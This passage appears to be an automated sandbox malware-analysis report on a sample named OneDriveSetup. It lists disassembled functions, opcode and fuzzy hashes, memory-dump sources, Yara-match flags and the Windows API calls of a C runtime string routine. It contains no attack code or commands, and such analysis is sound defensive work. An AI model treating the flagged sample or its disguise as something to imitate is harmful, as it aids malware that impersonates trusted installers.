                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9ada6737ebb37d8e2f0d8e2669321ba727e18a185b305d6cbef1ee5e30426b0c
                                                                                                                                                                        • Instruction ID: a9c58102fee6bf5f0ac358686c5d1a9231f1f8198b59de6d9d129e0fbb2e6969
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ada6737ebb37d8e2f0d8e2669321ba727e18a185b305d6cbef1ee5e30426b0c
                                                                                                                                                                        • Instruction Fuzzy Hash: 08C1B474E01218CFEB14DFA5C984B9DBBB2BF89300F5081AAD809AB355DB355E86CF51
                                                                                                                                                                        Function 0C41EF90 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c7fc0791c3ecd844a6462cf6ec501d5673df9c35cc64e82c19f7e4cc415830ac
                                                                                                                                                                        • Instruction ID: 4f3fe1ba22a6400b067eff92ca6adc52d28af66e978e531d20be4a6cce92d06d
                                                                                                                                                                        • Opcode Fuzzy Hash: c7fc0791c3ecd844a6462cf6ec501d5673df9c35cc64e82c19f7e4cc415830ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 47C1C374E01218CFEB14DFA5C984B9DBBB2BF89300F5081AAD809AB355DB355E86CF51
                                                                                                                                                                        Function 0C419358 Relevance: .3, Instructions: 262COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 42a16ef2eef35a823c1a28b3bd3f6937172ed7ab0e4ccefd4a2362e15fe46457
                                                                                                                                                                        • Instruction ID: bf92ff92b4cf5919606714d9dfb5ed53e36c8cc14d653cae1eea3222dadf1475
                                                                                                                                                                        • Opcode Fuzzy Hash: 42a16ef2eef35a823c1a28b3bd3f6937172ed7ab0e4ccefd4a2362e15fe46457
                                                                                                                                                                        • Instruction Fuzzy Hash: E291C471E042198BDF14DFBAC994BAEBBF2BFC8210F14856AD845A7390DB359D05CB50
                                                                                                                                                                        Function 0C415038 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9631f109f6b93e19ae09bfad7bbcc3ec931d449776a70971bbd4ddf9ffaebfce
                                                                                                                                                                        • Instruction ID: 01fc9b25a1c03a9d5c240cb75a805105d2b65830aef2223b217ea412b8a1a791
                                                                                                                                                                        • Opcode Fuzzy Hash: 9631f109f6b93e19ae09bfad7bbcc3ec931d449776a70971bbd4ddf9ffaebfce
                                                                                                                                                                        • Instruction Fuzzy Hash: 76B10471D106598EDB11DFA9C844ADDFBB1FF89300F10C2AAE458A7261EB709A85CF81
                                                                                                                                                                        Function 00402B90 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                        • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                                                                                                                                        • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                        • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                                                                                                                                        Function 0C41FC98 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0e63efac7e2ebb68c7ebbb969a4763366cb0a8901c924365fad2da272d118e1a
                                                                                                                                                                        • Instruction ID: 0d96634b8707ad8609b195fa73024e76167e226ca7276497f0c82973fd674192
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e63efac7e2ebb68c7ebbb969a4763366cb0a8901c924365fad2da272d118e1a
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D91B274E00258CFEB14DFA9C894BADBBB2FF88301F60812AD815AB394DB355946DF51
                                                                                                                                                                        Function 0C410676 Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2334eeaa7819e5798c349cd91c05436e918a88207dc18b56eee61b21f059fb5e
                                                                                                                                                                        • Instruction ID: 9deebb96f3ba2c2d4084a661abcdc5286bf422794dd9f29c096f4e6fcaf227e8
                                                                                                                                                                        • Opcode Fuzzy Hash: 2334eeaa7819e5798c349cd91c05436e918a88207dc18b56eee61b21f059fb5e
                                                                                                                                                                        • Instruction Fuzzy Hash: E5A17B74A01228CFDB64DF24C954B9ABBB2BB89301F5085EAD84EA7350DB359E81CF51
                                                                                                                                                                        Function 004028B0 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                        • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                                                                                                                                        • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                                                                                                                                        Function 0C410006 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 55630372c0c92682820f07c56045acdf6e0013c4bb7b5b20ec175c90ded821bf
                                                                                                                                                                        • Instruction ID: 46089f83a5985b792a9e6f5f769d5c88a7fc57844c7a5798c880708cbd5f1ece
                                                                                                                                                                        • Opcode Fuzzy Hash: 55630372c0c92682820f07c56045acdf6e0013c4bb7b5b20ec175c90ded821bf
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E710474E05259CFEB29CF66D880BADBBB2BF89200F10C0AAC409A7355DB315D86DF11
                                                                                                                                                                        Function 0C418BB0 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a53505e734577e6b0c17e8ecfe2c9dfc049cfae8ff836dbc5ba50c8abffcbaea
                                                                                                                                                                        • Instruction ID: 926baa89377372493d35bfbeddbd551b40f3c13596fca5f696d9b48a661f5c5f
                                                                                                                                                                        • Opcode Fuzzy Hash: a53505e734577e6b0c17e8ecfe2c9dfc049cfae8ff836dbc5ba50c8abffcbaea
                                                                                                                                                                        • Instruction Fuzzy Hash: EB4108B5D01218DBEB18CFAAD8887DEBBF2BF89314F14C12AD448BA294DB744545CF51
                                                                                                                                                                        Function 0C410856 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 03d588890c509121d5b668287bf50561538ccb95c6fa6acbc001ed1ec100aa83
                                                                                                                                                                        • Instruction ID: 2e0f30ee6c5b0322b1b2bef415a5b6c8926110ddc99e6dc068a1dd70c5dee7c4
                                                                                                                                                                        • Opcode Fuzzy Hash: 03d588890c509121d5b668287bf50561538ccb95c6fa6acbc001ed1ec100aa83
                                                                                                                                                                        • Instruction Fuzzy Hash: F2519074A01228CFDB64DF24D854B99BBB2FF4A301F5095EAD80AA7350DB359E81CF50
                                                                                                                                                                        Function 00401650 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                        • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                                                                                                                                        • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                        • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                                                                                                                                        Function 0C41D119 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f2aef9f72dfb6b2d5cd6141a6a2ab3686a70e8882c093080711f9bebdaf0839b
                                                                                                                                                                        • Instruction ID: 6ff46d24645ba8548adb64656fcd510ffbb21e5b774f5708cdbaea6c6e64c9ab
                                                                                                                                                                        • Opcode Fuzzy Hash: f2aef9f72dfb6b2d5cd6141a6a2ab3686a70e8882c093080711f9bebdaf0839b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4541D7B0E01248CBDB18DFAAD954ADEBBF2BF89300F64C12AC855BB255DB355946CF40
                                                                                                                                                                        Function 0C41E279 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a057bacc964e19398250e32723e23cdd66164baa24b0e82dacb2deee46a550f3
                                                                                                                                                                        • Instruction ID: 516829c472ed43919beec3d1e9cea1b9311fdb363c9d958710b7e775e015aa8d
                                                                                                                                                                        • Opcode Fuzzy Hash: a057bacc964e19398250e32723e23cdd66164baa24b0e82dacb2deee46a550f3
                                                                                                                                                                        • Instruction Fuzzy Hash: D141C774E01248CBEB18DFA6D854ADEBBF2BF89300F64C12AC815BB254DB355946CF50
                                                                                                                                                                        Function 00402F20 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                        • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                                                                                                                                        Function 0C41CCC0 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8ecd276667299f36745ae2715909230c30f6560172292fc445dd1be086e6875c
                                                                                                                                                                        • Instruction ID: cc1041d98cbfec60456d76cffb7a23555082d3618c66899080c411643d45ffbc
                                                                                                                                                                        • Opcode Fuzzy Hash: 8ecd276667299f36745ae2715909230c30f6560172292fc445dd1be086e6875c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8741E574E01248CBDB18DFAAD854ADEBBB2BF89300F60C12AC815BB254EB355946CF40
                                                                                                                                                                        Function 0C41E6D0 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c978e5928db991ac6d07e932081a262d83a0fa98aa86e76271b7c9b89aef177d
                                                                                                                                                                        • Instruction ID: 7c44d78d582216a315bf985603c3bb6c4050d3b3edc7744d7e8cd3291394e396
                                                                                                                                                                        • Opcode Fuzzy Hash: c978e5928db991ac6d07e932081a262d83a0fa98aa86e76271b7c9b89aef177d
                                                                                                                                                                        • Instruction Fuzzy Hash: B141D374E01248CBEB18DFAAD8546DDBBF2BF89300F64C12AC859AB254DB354946CF40
                                                                                                                                                                        Function 0C41EB29 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: aa0077415f9093ab0413873195ca4004a95b1d58f6168ef5cba9875dba42719c
                                                                                                                                                                        • Instruction ID: 19d129435270cabffe6529b74ccd28e9caae8a9684ac196ca1b70d326a9157c5
                                                                                                                                                                        • Opcode Fuzzy Hash: aa0077415f9093ab0413873195ca4004a95b1d58f6168ef5cba9875dba42719c
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F41E574E01248CBDB18DFA6D854ADEBBF2BF88300F64C12AD815BB254DB355946CF50
                                                                                                                                                                        Function 0C41F3D7 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ce802b1398fd477e86a7e3152d09f36335f302be52c044939223cd5acc1530d1
                                                                                                                                                                        • Instruction ID: 40a5f1d51fa13595d10c6a7fcc00bd06902cd6d414a5636ccb89dfae7b8859e3
                                                                                                                                                                        • Opcode Fuzzy Hash: ce802b1398fd477e86a7e3152d09f36335f302be52c044939223cd5acc1530d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A41C474E01248CBEB18DFEAD854ADEBBB2BF89300F60D12AC815BB255DB345946CF54
                                                                                                                                                                        Function 0C41F831 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 753c0a5e7afed747bcf943f5d291ff817eae7f9bad7ad66daed2663d67039c0b
                                                                                                                                                                        • Instruction ID: 37d5d4c21b90fb75f6b7674394200e474e38248421bc85b5d799eb47e8a4e631
                                                                                                                                                                        • Opcode Fuzzy Hash: 753c0a5e7afed747bcf943f5d291ff817eae7f9bad7ad66daed2663d67039c0b
                                                                                                                                                                        • Instruction Fuzzy Hash: ED41B474D01648CBEB18DFE6D454A9EBBF2BF89300F60D12AC819BB254EB345946CF54
                                                                                                                                                                        Function 0C41EF80 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 37463fa5c3c0cabb1b42702fc66f2bf3f0cf326d92fdb85873fa5186a4c9fba4
                                                                                                                                                                        • Instruction ID: 72e267b576442cbd5a5e4134b913c35437fc1624452795b55928a27c040eee08
                                                                                                                                                                        • Opcode Fuzzy Hash: 37463fa5c3c0cabb1b42702fc66f2bf3f0cf326d92fdb85873fa5186a4c9fba4
                                                                                                                                                                        • Instruction Fuzzy Hash: 4641B270E01248CBEB18DFAAD854ADDBBF2BF89300F60D12AC819BB254DB344946CF44
                                                                                                                                                                        Function 0C41D570 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 20f2cbd28064e9c6383008194126ae92155174940ea0fe37ac78e894de72060f
                                                                                                                                                                        • Instruction ID: f91b3ff8600359d3e3f6de156c5c0a591c77190e236b640bde285d7830cad0c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 20f2cbd28064e9c6383008194126ae92155174940ea0fe37ac78e894de72060f
                                                                                                                                                                        • Instruction Fuzzy Hash: 0841C5B4E01248CBDB18DFAAC854ADDBBF2BF89300F60C12AC819BB254DB355946CF50
                                                                                                                                                                        Function 00402F89 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                        • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                                                                                                                                        • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                        • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                                                                                                                                        Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,08531950), ref: 004170C5
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                        • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                        • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                        • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                        • _memset.LIBCMT ref: 00417384
                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                        • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
